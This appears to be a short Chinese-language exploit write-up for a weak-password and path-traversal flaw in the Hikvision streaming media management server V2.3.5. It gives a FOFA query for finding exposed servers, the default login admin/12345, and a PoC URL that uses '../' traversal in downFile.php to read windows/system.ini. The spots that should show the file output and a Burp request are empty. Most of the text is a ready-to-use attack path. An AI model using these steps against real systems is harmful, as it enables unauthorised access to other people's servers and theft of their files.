一、漏洞描述
海康威視是以視頻為核心的智能物聯網解決方案和大數據服務提供商。
杭州海康威視系統技術有限公司流媒體管理服務器存在弱口令漏洞,攻擊者可利用該漏洞獲取敏感信息。
二、影響范圍
海康威視流媒體管理服務器 V2.3.5
三、漏洞利用
fofa搜索:title="流媒體管理服務器"
隨便進入一個可以看到后台登錄界面
使用弱口令admin/12345可成功登錄,登錄之后可讀取文件,poc如下:
http://xxx.xxx.xxx.xxx:xx/systemLog/downFile.phpfileName=../../../../../../../windows/system.ini
讀取的文件內容如下:
或者登錄成功之后用burp利用漏洞,如下:
